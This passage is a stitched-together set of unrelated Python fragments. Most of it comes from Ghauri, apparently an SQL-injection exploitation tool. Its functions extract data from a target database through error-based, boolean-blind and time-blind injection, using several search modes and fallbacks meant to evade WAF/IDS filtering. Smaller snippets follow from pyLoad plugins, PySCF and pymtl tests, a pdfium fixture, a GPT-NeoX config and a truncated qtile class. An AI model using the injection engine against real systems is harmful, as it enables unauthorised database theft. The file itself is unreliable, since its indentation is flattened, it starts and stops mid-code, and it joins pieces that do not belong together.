    determined). When ``query_check`` is set and a digit count was found,
    returns the working payload instead so callers can probe injectability.
    """
    noc, working_query = self.fetch_noc(url, data, vector, parameter, headers, base, injection_type, payloads=payloads, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack01=attack01, code=code, match_string=match_string, not_match_string=not_match_string, suppress_output=suppress_output, text_only=text_only, vector_type=vector_type)
    if query_check and noc > 0:
        # Query-check mode only needs proof that a working payload exists.
        return working_query
    # Initialise up front: previously `length` was only bound inside the
    # extraction branches, so "noc >= 1 but nothing extracted" raised
    # UnboundLocalError at the final return.
    length = 0
    if noc < 1:
        # (typo fixed: "number if" -> "number of")
        logger.debug("Ghauri couldn't determine the number of character(s) in length query")
    if noc >= 1:
        if not suppress_output:
            logger.info('retrieving the length of query output')
        length_extraction_payloads = LENGTH_PAYLOADS.get(backend)
        if isinstance(length_extraction_payloads, str):
            length_extraction_payloads = [length_extraction_payloads]
        for value in length_extraction_payloads:
            is_length_found = False
            for entry in payloads:
                chars = ''
                pos = 1
                total_number_of_characters = noc + 1
                while pos < total_number_of_characters:
                    if attack01 and vector_type == 'boolean_vector':
                        try:
                            # Binary search over ASCII digits only (48..58).
                            retval = self._binary_search(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, delay=delay, timesec=timesec, timeout=timeout, proxy=proxy, attack01=attack01, code=code, match_string=match_string, not_match_string=not_match_string, is_multipart=is_multipart, suppress_output=suppress_output, query_check=query_check, minimum=48, maximum=58, offset=pos, expression_payload=value, queryable=entry, chars=chars, text_only=text_only, vector_type=vector_type)
                            if retval:
                                is_valid = self.validate_character(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, identified_character=retval, vector_type=vector_type, offset=pos, expression_payload=value, queryable=entry, code=code, match_string=match_string, not_match_string=not_match_string, attack01=attack01)
                                if not is_valid:
                                    # Fall back to a linear scan when the binary
                                    # search produced a character that does not
                                    # re-validate (e.g. WAF interference).
                                    logger.warning('invalid character detected, retrying..')
                                    retval = self._linear_search(url=url, data=data, vector=vector, parameter=parameter, headers=headers, injection_type=injection_type, proxy=proxy, attack01=attack01, is_multipart=is_multipart, timeout=timeout, match_string=match_string, not_match_string=not_match_string, text_only=text_only, delay=delay, timesec=timesec, suppress_output=suppress_output, expression_payload=value, queryable=entry, chars=chars, offset=pos, list_of_chars='', vector_type=vector_type, base=base)
                                    if retval:
                                        is_valid = self.validate_character(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, identified_character=retval, vector_type=vector_type, offset=pos, expression_payload=value, queryable=entry, code=code, match_string=match_string, not_match_string=not_match_string, attack01=attack01)
                                if is_valid:
                                    pos += 1
                                    chars += retval
                                    logger.debug(f'character found: {chars}')
                        except KeyboardInterrupt:
                            is_length_found = True
                            length = 0
                            break
                    if vector_type == 'time_vector':
                        try:
                            retval = self._linear_search(url=url, data=data, vector=vector, parameter=parameter, headers=headers, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, suppress_output=suppress_output, expression_payload=value, queryable=entry, chars=chars, offset=pos, list_of_chars='', vector_type=vector_type)
                            pos += 1
                            chars += retval
                            logger.debug(f"character found: '{str(chars)}'")
                        except KeyboardInterrupt:
                            is_length_found = True
                            length = 0
                            break
                if len(chars) == noc:
                    if not suppress_output:
                        logger.info(f'retrieved: {chars}')
                    length = int(chars) if chars.isdigit() else 0
                    is_length_found = True
                    break
            if is_length_found:
                break
    return length
def fetch_using_error_based_vector(self, url, data, parameter, headers, injection_type, payloads, backend='', proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, suppress_output=False, query_check=False, text_only=False, retry=3, dump_type=None):
    """Extract data through the error-based vector, when one was identified.

    Iterates over candidate payloads, injects each via the stored
    'error_vector', and scrapes the DBMS error message out of the response
    with a battery of regexes. A previously extracted value is resumed from
    the session storage unless fresh queries were requested.

    Returns a PayloadResponse namedtuple (ok, error, result, payload, resumed).
    (A garbled, unused local assignment and the unused `error_msg` local
    from the original were dropped.)
    """
    PayloadResponse = collections.namedtuple('PayloadResponse', ['ok', 'error', 'result', 'payload', 'resumed'])
    _temp = PayloadResponse(ok=False, error='', result='', payload='', resumed=False)
    error_based_in_vectors = bool('error_vector' in conf.vectors)
    start = 0
    end = len(payloads)
    retry_on_error = 0
    is_resumed = False
    # Resume a previously extracted value from the session DB when possible.
    if dump_type and not conf.fresh_queries:
        retval_session = session.fetchall(session_filepath=conf.session_filepath, query='SELECT * FROM storage WHERE `type`=?', values=(dump_type,))
        if retval_session:
            retval_session = retval_session.pop()
            is_resumed = True
            result = retval_session.get('value')
            length = retval_session.get('length')
            logger.progress(f'resumed: {result}')
            last_row_id = retval_session.get('id')
            if len(result) == length:
                # Value already complete; no need to hit the target again.
                _temp = PayloadResponse(ok=True, error='', result=result, payload='', resumed=is_resumed)
                return _temp
    if error_based_in_vectors:
        vector = conf.vectors.get('error_vector')
        while start < end:
            # Connection-error branches below do not advance `start`, so a
            # persistently unreachable target previously looped forever.
            # Honor the (previously unused) `retry` parameter as a cap.
            if retry_on_error >= retry:
                logger.warning('Ghauri detected too many connection errors, skipping error-based data extraction..')
                break
            entry = payloads[start]
            response_string = ''
            if delay > 0:
                time.sleep(delay)
            expression = vector.replace('[INFERENCE]', f'{entry}')
            if backend == 'Microsoft SQL Server':
                # '+' means string concatenation on MSSQL; URL-encode it so it
                # survives transport inside the request.
                expression = expression.replace('+', '%2b')
            logger.payload(f'{expression}')
            try:
                attack = inject_expression(url=url, data=data, proxy=proxy, delay=delay, timesec=timesec, timeout=timeout, headers=headers, parameter=parameter, expression=expression, is_multipart=is_multipart, injection_type=injection_type)
                response_string = attack.filtered_text if text_only else attack.text
                start += 1
            except KeyboardInterrupt:
                logger.warning('user aborted during data extraction phase')
                quest = logger.read_input('how do you want to proceed? [(C)continue/(e)nd this phase/(q)uit] ', batch=False, user_input='C')
                if quest and quest == 'e':
                    _temp = PayloadResponse(ok=False, error='user_ended', result='', payload='', resumed=is_resumed)
                    return _temp
                if quest and quest == 'q':
                    logger.error('user quit')
                    logger.end('ending')
                    exit(0)
            except ConnectionAbortedError:
                logger.critical('connection attempt to the target URL was aborted by the peer, Ghauri is going to retry')
                retry_on_error += 1
            except ConnectionRefusedError:
                logger.critical('connection attempt to the target URL was refused by the peer. Ghauri is going to retry')
                retry_on_error += 1
            except ConnectionResetError:
                logger.critical('connection attempt to the target URL was reset by the peer. Ghauri is going to retry')
                retry_on_error += 1
            except Exception as error:
                logger.critical(f'error {error}, during detection phase. Ghauri is going to retry')
                retry_on_error += 1
            # Scrape the injected value out of any DBMS error message echoed
            # back in the response body.
            retval = search_regex(pattern=(REGEX_XPATH, REGEX_ERROR_BASED, REGEX_BIGINT_BASED, REGEX_DOUBLE_BASED, REGEX_GEOMETRIC_BASED, REGEX_GTID_BASED, REGEX_JSON_KEYS, REGEX_GENERIC, REGEX_MSSQL_STRING, REGEX_GENERIC_ERRORS), string=response_string, default=None, group='error_based_response')
            if retval and retval != '<blank_value>':
                if backend == 'Microsoft SQL Server':
                    if entry.endswith('sysobjects)') or entry.endswith('..syscolumns)'):
                        logger.debug(f"entries found with query '{entry}': {retval}, setting the return to 1 as we can't use where clause in query..")
                        retval = '1'
                        logger.warning('the SQL query provided does not return any output')
                        logger.warning('it was not possible to count the number of entries for the SQL query provided. Ghauri will assume that it returns only one entry')
                try:
                    if dump_type and not conf.fresh_queries:
                        # Persist the extracted value so later runs can resume.
                        session.dump(session_filepath=conf.session_filepath, query=STORAGE, values=(retval, len(retval), dump_type))
                except Exception as error:
                    logger.warning(error)
                _temp = PayloadResponse(ok=True, error='', result=retval, payload=entry, resumed=is_resumed)
                break
    return _temp
# Extract the full output of a SQL query character by character.
# Strategy: try the error-based vector first (fastest); otherwise fall back
# to blind vectors ('boolean_vector' / 'time_vector'), extracting the value
# either with a thread pool (one offset per worker) or sequentially, using
# binary / BETWEEN / IN / linear search modes that toggle each other on
# invalid-character detection. Partially extracted values are resumed from
# the session storage. Returns a PayloadResponse namedtuple.
# NOTE(review): indentation of this dump is mangled; nesting below is as
# extracted, not verified against upstream.
def fetch_characters(self, url, data, vector, parameter, headers, base, injection_type, payloads, backend='', proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack01=None, code=None, match_string=None, not_match_string=None, suppress_output=False, query_check=False, list_of_chars=None, text_only=False, dump_type=None):
PayloadResponse = collections.namedtuple('PayloadResponse', ['ok', 'error', 'result', 'payload', 'resumed'])
_temp = PayloadResponse(ok=False, error='', result='', payload='', resumed=False)
other_vectors = bool((('boolean_vector' in conf.vectors) or ('time_vector' in conf.vectors)))
# Fast path: error-based extraction; return immediately on success or if the
# user ended the phase during it.
retval_error = self.fetch_using_error_based_vector(url, data, parameter, headers, injection_type, payloads, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, suppress_output=suppress_output, query_check=query_check, text_only=text_only, dump_type=dump_type)
if retval_error.ok:
_temp_error = PayloadResponse(ok=retval_error.ok, error=retval_error.error, result=retval_error.result, payload=retval_error.payload, resumed=retval_error.resumed)
return _temp_error
if (not retval_error.ok):
if (retval_error.error == 'user_ended'):
_temp_error = PayloadResponse(ok=retval_error.ok, error=retval_error.error, result=retval_error.result, payload=retval_error.payload, resumed=retval_error.resumed)
return _temp_error
# Fallback character set used by the linear search when none was supplied.
if (not list_of_chars):
list_of_chars = '._-+!#$%^&*()+'
data_extraction_payloads = DATA_EXTRACTION_PAYLOADS.get(backend)
if isinstance(data_extraction_payloads, dict):
data_extraction_payloads = [data_extraction_payloads]
attack_url = url
attack_data = data
attack_headers = headers
user_aborted = False
change_algo_on_invalid_character = False
invalid_character_detection_counter = 0
bool_invalid_character_counter = 0
is_change_algo_notified = False
# Search-mode flags; exactly one is active at a time and they toggle each
# other below when a character fails re-validation.
binary_search = False
in_based_search = False
linear_search = False
between_based_search = False
is_resumed = False
start_pos = 1
start_chars = ''
# Resume a partially extracted value from the session DB when possible.
if (dump_type and (not conf.fresh_queries)):
retval_session = session.fetchall(session_filepath=conf.session_filepath, query='SELECT * FROM storage WHERE `type`=?', values=(dump_type,))
if retval_session:
retval_session = retval_session.pop()
is_resumed = True
_v = retval_session.get('value')
length = retval_session.get('length')
start_pos = (len(_v) + 1)
start_chars = _v
logger.progress(f'resumed: {_v}')
last_row_id = retval_session.get('id')
if (len(_v) == length):
_temp = PayloadResponse(ok=True, error='', result=_v, payload='', resumed=is_resumed)
return _temp
# Blind extraction: try each remaining vector (boolean/time) in turn.
for (vector_type, vector) in conf.vectors.items():
if (vector_type in ['error_vector']):
continue
if (not is_resumed):
length = self.fetch_length(url, data, vector, parameter, headers, base, injection_type, payloads=payloads, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack01=attack01, code=code, match_string=match_string, not_match_string=not_match_string, query_check=query_check, suppress_output=suppress_output, text_only=text_only, vector_type=vector_type)
if (length == 0):
logger.warning('it was not possible to extract query output length for the SQL query provided.')
continue
if query_check:
# In query-check mode `payload` carries the working length payload.
return PayloadResponse(ok=True, error='', result='', payload=length, resumed=False)
try:
if ((not is_resumed) and dump_type and (not conf.fresh_queries)):
last_row_id = session.dump(session_filepath=conf.session_filepath, query=STORAGE, values=('', length, dump_type))
except Exception as error:
logger.warning(error)
is_done_with_vector = False
# Probe which comparison operators ('=', 'BETWEEN', 'IN', '>') survive
# filtering, to pick the initial search mode.
retval_check = self._check_operator(url, data, vector, parameter, headers, base, injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack01=attack01, match_string=match_string, not_match_string=not_match_string, vector_type=vector_type, text_only=text_only)
if retval_check.ok:
binary_search = retval_check.binary_search
in_based_search = retval_check.in_based_search
linear_search = retval_check.linear_search
between_based_search = retval_check.between_based_search
if (not retval_check.ok):
logger.critical("ghauri will not be able to extract data as '=', 'IN' and '>' all are filtered by back-end server..")
logger.end('ending')
exit(0)
for entries in data_extraction_payloads:
is_extracted = False
for (_, value) in entries.items():
is_char_found = False
for entry in payloads:
chars = start_chars
pos = start_pos
total_length = (length + 1)
# Threads only make sense for the searching modes; the linear
# fallback must run single-threaded.
if (conf.threads and (not binary_search) and (not in_based_search) and (not between_based_search)):
logger.debug('Ghauri will use a fallback leaner search to guess character(s), adjusting threads to 1')
conf.threads = None
if (conf.threads and (vector_type == 'boolean_vector')):
# Threaded path: one worker per character offset, results merged
# by offset into conf._thread_chars_query.
if (not conf.thread_warning):
logger.debug('it is recommended not to use threads for data exfiltration, it could cause harm to backend DBMS or result in incorrect character(s) guessing.')
conf.thread_warning = True
[conf._thread_chars_query.update({offset: '_'}) for offset in range(pos, total_length)]
if (chars and (len(chars) >= 1)):
logger.debug('appending characters found already')
for (_, ch) in enumerate(chars):
conf._thread_chars_query.update({(_ + 1): ch})
conf._thread_chars_query = collections.OrderedDict(sorted(conf._thread_chars_query.items()))
if (conf.threads > conf._max_threads):
conf.threads = conf._max_threads
if (not conf.max_threads_warning):
logger.warning(f"""Ghauri recommends using threads upto {conf._max_threads}. adjusting '--threads="{conf._max_threads}"'.""")
conf.max_threads_warning = True
with futures.ThreadPoolExecutor(max_workers=conf.threads) as ex:
exfiltration_func = None
if binary_search:
exfiltration_func = self._binary_search
if in_based_search:
exfiltration_func = self._search_using_in_operator
if between_based_search:
exfiltration_func = self._search_using_between_operator
exec_map = {ex.submit(exfiltration_func, url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, delay=delay, timesec=timesec, timeout=timeout, proxy=proxy, attack01=attack01, code=code, match_string=match_string, not_match_string=not_match_string, is_multipart=is_multipart, suppress_output=suppress_output, query_check=query_check, minimum=32, maximum=127, offset=offset, expression_payload=value, queryable=entry, chars=chars, text_only=text_only, vector_type=vector_type): offset for offset in range(pos, total_length)}
try:
for future in futures.as_completed(exec_map):
offset = exec_map[future]
logger.progress('retrieved: {}'.format(chars))
try:
character = future.result()
except Exception as exc:
logger.error(f" * generated an exception: '{exc}' on offset '{offset}'")
except KeyboardInterrupt as error:
raise error
else:
if (character and (character != '') and (character is not None)):
conf._thread_chars_query.update({offset: character})
except KeyboardInterrupt as error:
logger.error('user aborted, terminating threads gracefully')
raise error
# Reassemble the value in offset order from the shared dict.
chars = ''.join([str(i) for i in collections.OrderedDict(sorted(conf._thread_chars_query.items())).values()])
conf._thread_chars_query = {}
with conf.lock:
try:
if (dump_type and chars and (not conf.fresh_queries)):
session.dump(session_filepath=conf.session_filepath, query=STORAGE_UPDATE, values=(chars, last_row_id, dump_type))
except Exception as error:
logger.warning(error)
logger.debug(f"character(s) found: '{chars}'")
else:
# Sequential path: one character per loop iteration; on an invalid
# character the active search mode is demoted (binary -> between ->
# in -> linear) and the same offset is retried.
while (pos < total_length):
start_pos = pos
if (attack01 and (vector_type == 'boolean_vector')):
try:
if binary_search:
retval = self._binary_search(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, delay=delay, timesec=timesec, timeout=timeout, proxy=proxy, attack01=attack01, code=code, match_string=match_string, not_match_string=not_match_string, is_multipart=is_multipart, suppress_output=suppress_output, query_check=query_check, minimum=32, maximum=127, offset=pos, expression_payload=value, queryable=entry, chars=chars, text_only=text_only, vector_type=vector_type)
if retval:
is_valid = self.validate_character(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, identified_character=retval, vector_type=vector_type, offset=pos, expression_payload=value, queryable=entry, code=code, match_string=match_string, not_match_string=not_match_string, attack01=attack01)
if (not is_valid):
logger.warning('invalid character detected, retrying.')
bool_invalid_character_counter += 1
binary_search = False
between_based_search = True
in_based_search = False
linear_search = False
if is_valid:
pos += 1
chars += retval
elif between_based_search:
retval = self._search_using_between_operator(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, delay=delay, timesec=timesec, timeout=timeout, proxy=proxy, attack01=attack01, code=code, match_string=match_string, not_match_string=not_match_string, is_multipart=is_multipart, suppress_output=suppress_output, query_check=query_check, minimum=32, maximum=127, offset=pos, expression_payload=value, queryable=entry, chars=chars, text_only=text_only, vector_type=vector_type)
if retval:
is_valid = self.validate_character(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, identified_character=retval, vector_type=vector_type, offset=pos, expression_payload=value, queryable=entry, code=code, match_string=match_string, not_match_string=not_match_string, attack01=attack01)
if (not is_valid):
logger.warning('invalid character detected, retrying.')
bool_invalid_character_counter += 1
binary_search = False
between_based_search = False
in_based_search = True
linear_search = False
if is_valid:
pos += 1
chars += retval
elif in_based_search:
retval = self._search_using_in_operator(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, delay=delay, timesec=timesec, timeout=timeout, proxy=proxy, attack01=attack01, match_string=match_string, not_match_string=not_match_string, text_only=text_only, is_multipart=is_multipart, suppress_output=suppress_output, query_check=query_check, minimum=32, maximum=127, offset=pos, expression_payload=value, queryable=entry, chars=chars, vector_type=vector_type)
if retval:
is_valid = self.validate_character(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, identified_character=retval, vector_type=vector_type, offset=pos, expression_payload=value, queryable=entry, code=code, match_string=match_string, not_match_string=not_match_string, attack01=attack01)
if (not is_valid):
logger.warning('invalid character detected, retrying.')
bool_invalid_character_counter += 1
binary_search = False
in_based_search = False
linear_search = True
if is_valid:
pos += 1
chars += retval
else:
retval = self._linear_search(url=url, data=data, vector=vector, parameter=parameter, headers=headers, injection_type=injection_type, proxy=proxy, attack01=attack01, is_multipart=is_multipart, timeout=timeout, match_string=match_string, not_match_string=not_match_string, text_only=text_only, delay=delay, timesec=timesec, suppress_output=suppress_output, expression_payload=value, queryable=entry, chars=chars, offset=pos, list_of_chars=list_of_chars, vector_type=vector_type, base=base)
if retval:
is_valid = self.validate_character(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, identified_character=retval, vector_type=vector_type, offset=pos, expression_payload=value, queryable=entry, code=code, match_string=match_string, not_match_string=not_match_string, attack01=attack01)
if (not is_valid):
logger.warning('invalid character detected, retrying.')
bool_invalid_character_counter += 1
# Linear failed too: reset modes back to what the operator probe chose.
binary_search = retval_check.binary_search
in_based_search = retval_check.in_based_search
linear_search = retval_check.linear_search
if is_valid:
pos += 1
chars += retval
try:
if (bool_invalid_character_counter >= 3):
logger.debug('it seems the current payload is filtered out by some sort of WAF/IDS.')
break
if (dump_type and chars and (not conf.fresh_queries)):
session.dump(session_filepath=conf.session_filepath, query=STORAGE_UPDATE, values=(chars, last_row_id, dump_type))
except Exception as error:
logger.warning(error)
logger.debug(f"character(s) found: '{str(chars)}'")
except KeyboardInterrupt:
is_char_found = True
is_extracted = True
is_done_with_vector = True
if (chars and (len(chars) > 0)):
logger.info(f"retrieved: '{chars}'")
_temp = PayloadResponse(ok=False, error='user_ended', result=chars, payload=entry, resumed=False)
break
if (vector_type == 'time_vector'):
try:
if binary_search:
retval = self._binary_search(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, delay=delay, timesec=timesec, timeout=timeout, proxy=proxy, is_multipart=is_multipart, suppress_output=suppress_output, query_check=query_check, minimum=32, maximum=127, offset=pos, expression_payload=value, queryable=entry, chars=chars, vector_type=vector_type)
if retval:
is_valid = self.validate_character(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, identified_character=retval, vector_type=vector_type, offset=pos, expression_payload=value, queryable=entry)
if (not is_valid):
logger.warning('invalid character detected, retrying.')
invalid_character_detection_counter += 1
binary_search = False
in_based_search = True
linear_search = False
if is_valid:
pos += 1
chars += retval
elif in_based_search:
retval = self._search_using_in_operator(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, delay=delay, timesec=timesec, timeout=timeout, proxy=proxy, is_multipart=is_multipart, suppress_output=suppress_output, query_check=query_check, minimum=32, maximum=127, offset=pos, expression_payload=value, queryable=entry, chars=chars, vector_type=vector_type)
if retval:
is_valid = self.validate_character(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, identified_character=retval, vector_type=vector_type, offset=pos, expression_payload=value, queryable=entry)
if (not is_valid):
logger.warning('invalid character detected, retrying..')
invalid_character_detection_counter += 1
binary_search = False
in_based_search = False
linear_search = True
if is_valid:
pos += 1
chars += retval
else:
retval = self._linear_search(url=url, data=data, vector=vector, parameter=parameter, headers=headers, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, suppress_output=suppress_output, expression_payload=value, queryable=entry, chars=chars, offset=pos, list_of_chars=list_of_chars, vector_type=vector_type)
if retval:
is_valid = self.validate_character(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, identified_character=retval, vector_type=vector_type, offset=pos, expression_payload=value, queryable=entry)
if (not is_valid):
logger.warning('invalid character detected, retrying..')
invalid_character_detection_counter += 1
binary_search = retval_check.binary_search
in_based_search = retval_check.in_based_search
linear_search = retval_check.linear_search
if is_valid:
pos += 1
chars += retval
# NOTE(review): the two lines below append/advance AGAIN after the
# `if is_valid` guard above — looks like a double-append/advance in
# the time-vector linear branch; confirm nesting against upstream.
chars += retval
pos += 1
try:
if (invalid_character_detection_counter >= 3):
logger.debug('it seems the current payload is filtered out by some sort of WAF/IDS.')
break
if (dump_type and chars and (not conf.fresh_queries)):
session.dump(session_filepath=conf.session_filepath, query=STORAGE_UPDATE, values=(chars, last_row_id, dump_type))
except Exception as error:
logger.warning(error)
logger.debug(f"character(s) found: '{str(chars)}'")
except KeyboardInterrupt:
is_char_found = True
is_extracted = True
is_done_with_vector = True
if (chars and (len(chars) > 0)):
logger.info(f"retrieved: '{chars}'")
_temp = PayloadResponse(ok=False, error='user_ended', result=chars, payload=entry, resumed=is_resumed)
break
if (len(chars) == length):
is_char_found = True
_temp = PayloadResponse(ok=True, error='', result=chars, payload=entry, resumed=False)
response = chars
break
if is_char_found:
is_extracted = True
break
if is_extracted:
is_done_with_vector = True
break
if (not is_done_with_vector):
logger.debug(f"Ghauri was not able to extract the data with vector type '{vector_type}', switching to other vector type(s) if any..")
if is_done_with_vector:
break
return _temp
def render_pdffile_topil(multipage_doc):
    """Fixture helper: render the 3-page document to PIL images at half scale."""
    page_iter = multipage_doc.render(pdfium.PdfBitmap.to_pil, scale=0.5)
    rendered = []
    for page_img in page_iter:
        assert isinstance(page_img, PIL.Image.Image)
        assert (page_img.mode == 'RGB')
        rendered.append(page_img)
    # The test document is known to have exactly three pages.
    assert (len(rendered) == 3)
    yield rendered
class LinksnappyCom(MultiAccount):
    """Linksnappy.com multi-hoster account plugin for pyLoad."""

    __name__ = 'LinksnappyCom'
    __type__ = 'account'
    __version__ = '0.22'
    __status__ = 'testing'
    __config__ = [('mh_mode', 'all;listed;unlisted', 'Filter downloaders to use', 'all'), ('mh_list', 'str', 'Downloader list (comma separated)', ''), ('mh_interval', 'int', 'Reload interval in hours', 12)]
    __description__ = 'Linksnappy.com account plugin'
    __license__ = 'GPLv3'
    __authors__ = [('stickell', 'l.'), ('GammaC0de', 'nitzo2001[AT]yahoo[DOT]com')]

    # Restored: the string literal was truncated/unterminated in the source.
    # Value matches the upstream pyLoad plugin -- TODO confirm against upstream.
    API_URL = 'https://linksnappy.com/api/'

    def api_request(self, method, **kwargs):
        """Call a Linksnappy API method and decode the JSON response."""
        return json.loads(self.load(self.API_URL + method, get=kwargs))

    def grab_hosters(self, user, password, data):
        """Return the hoster names currently enabled ('Status' == '1')."""
        json_data = self.api_request('FILEHOSTS')
        return [k for (k, v) in json_data['return'].items() if (v['Status'] == '1')]

    def grab_info(self, user, password, data):
        """Fetch account details: premium flag, expiry and remaining traffic."""
        premium = True
        validuntil = None
        trafficleft = None
        json_data = self.api_request('USERDETAILS', username=user, password=password)
        if (json_data['status'] != 'OK'):
            self.log_error(json_data['error'])
        else:
            expire = json_data['return']['expire']
            if (expire == 'lifetime'):
                validuntil = (- 1)  # never expires
            elif (expire == 'expired'):
                premium = False
            else:
                validuntil = float(expire)
            # A string 'trafficleft' (e.g. "unlimited") means no traffic cap.
            if isinstance(json_data['return'].get('trafficleft', ''), str):
                trafficleft = (- 1)
            else:
                # API reports KiB; pyLoad expects bytes-scale units (*1024).
                trafficleft = (float(json_data['return']['trafficleft']) * 1024)
        return {'premium': premium, 'validuntil': validuntil, 'trafficleft': trafficleft}

    def signin(self, user, password, data):
        """Validate credentials against the API; abort login on error."""
        json_data = self.api_request('AUTHENTICATE', username=user, password=password)
        if (json_data['status'] != 'OK'):
            self.fail_login(json_data['error'])
# Module-level test fixture: builds a shared H2O/STO-3G system (RHF reference,
# MO-basis one- and two-electron integrals, a symmetry-adapted FCI solver and a
# random symmetric trial CI vector) and publishes everything through globals
# consumed by the test cases in this module.
def setUpModule():
global mol, m, h1e, g2e, ci0, cis
global norb, nelec, orbsym
mol = gto.Mole()
mol.verbose = 0
mol.atom = '\n O 0. 0. 0.\n H 0. -0.757 0.587\n H 0. 0.757 0.587'
mol.basis = 'sto-3g'
mol.symmetry = 'c2v'
mol.build()
m = scf.RHF(mol)
# Tight gradient convergence so downstream FCI results are reproducible.
m.conv_tol_grad = 1e-08
ehf = m.scf()
norb = m.mo_coeff.shape[1]
nelec = mol.nelectron
# Core Hamiltonian and ERIs transformed from AO to the MO basis.
h1e = reduce(numpy.dot, (m.mo_coeff.T, scf.hf.get_hcore(mol), m.mo_coeff))
g2e = ao2mo.incore.full(m._eri, m.mo_coeff)
orbsym = m.orbsym
cis = fci.direct_spin0_symm.FCISolver(mol)
cis.orbsym = orbsym
# Fixed seed for determinism; symmetrizing makes ci0 a valid spin0 CI vector.
numpy.random.seed(15)
na = fci.cistring.num_strings(norb, (nelec // 2))
ci0 = numpy.random.random((na, na))
ci0 = ((ci0 + ci0.T) * 0.5)
class FilerNetFolder(SimpleDecrypter):
    """Filer.net folder decrypter plugin for pyLoad."""

    __name__ = 'FilerNetFolder'
    __type__ = 'decrypter'
    __version__ = '0.48'
    __status__ = 'testing'
    # Restored: the pattern literal was truncated/unterminated in the source.
    # Value matches the upstream pyLoad plugin -- TODO confirm against upstream.
    __pattern__ = r'https?://filer\.net/folder/\w{16}'
    __config__ = [('enabled', 'bool', 'Activated', True), ('use_premium', 'bool', 'Use premium account if available', True), ('folder_per_package', 'Default;Yes;No', 'Create folder for each package', 'Default'), ('max_wait', 'int', 'Reconnect if waiting time is greater than minutes', 10)]
    __description__ = 'Filer.net decrypter plugin'
    __license__ = 'GPLv3'
    __authors__ = [('nath_schwarz', 'nathan.'), ('stickell', 'l.')]

    # Regexes used by SimpleDecrypter to scrape the folder page:
    # links to individual files, the folder name, and the offline marker.
    LINK_PATTERN = 'href="(/get/\\w{16})">(?!<)'
    NAME_PATTERN = '<h3>(?P<N>.+?) - <small'
    OFFLINE_PATTERN = 'Nicht gefunden'
def test_wr_As_wr_A_conflict():
    """Two update blocks writing the same wire must raise MultiWriterError."""

    class Top(ComponentLevel3):

        def construct(s):
            s.A = Wire(Bits32)

            def up_wr_As():
                s.A[1:3] = Bits2(2)

            def up_wr_A():
                s.A = Bits32(123)

    try:
        _test_model(Top)
    except MultiWriterError as e:
        # Expected failure path: report which error type was raised.
        print('{} is thrown\n{}'.format(e.__class__.__name__, e))
    else:
        # Elaboration succeeded, which means the conflict went undetected.
        raise Exception("Should've thrown MultiWriterError.")
class GPTNeoXConfig(PretrainedConfig):
    """Configuration container for GPT-NeoX models.

    Stores the architecture hyperparameters only; defaults match the
    gpt-neox-20b checkpoint.
    """

    model_type = 'gpt_neox'

    def __init__(self, vocab_size=50432, hidden_size=6144, num_hidden_layers=44, num_attention_heads=64, intermediate_size=24576, hidden_act='gelu', rotary_pct=0.25, rotary_emb_base=10000, max_position_embeddings=2048, initializer_range=0.02, layer_norm_eps=1e-05, use_cache=True, bos_token_id=0, eos_token_id=2, tie_word_embeddings=False, **kwargs):
        # Special-token ids are handled by the base class.
        super().__init__(bos_token_id=bos_token_id, eos_token_id=eos_token_id, **kwargs)
        # Model dimensions.
        self.vocab_size = vocab_size
        self.hidden_size = hidden_size
        self.num_hidden_layers = num_hidden_layers
        self.num_attention_heads = num_attention_heads
        self.intermediate_size = intermediate_size
        self.max_position_embeddings = max_position_embeddings
        # Activation and rotary-embedding settings.
        self.hidden_act = hidden_act
        self.rotary_pct = rotary_pct
        self.rotary_emb_base = rotary_emb_base
        # Initialization, normalization and runtime flags.
        self.initializer_range = initializer_range
        self.layer_norm_eps = layer_norm_eps
        self.use_cache = use_cache
        self.tie_word_embeddings = tie_word_embeddings
class Groups(object):
    """Builds the qtile workspace groups with their layouts and window-match rules."""

    def init_groups(self):
        layout = Layouts()
        return [
            # System / terminal workspaces.
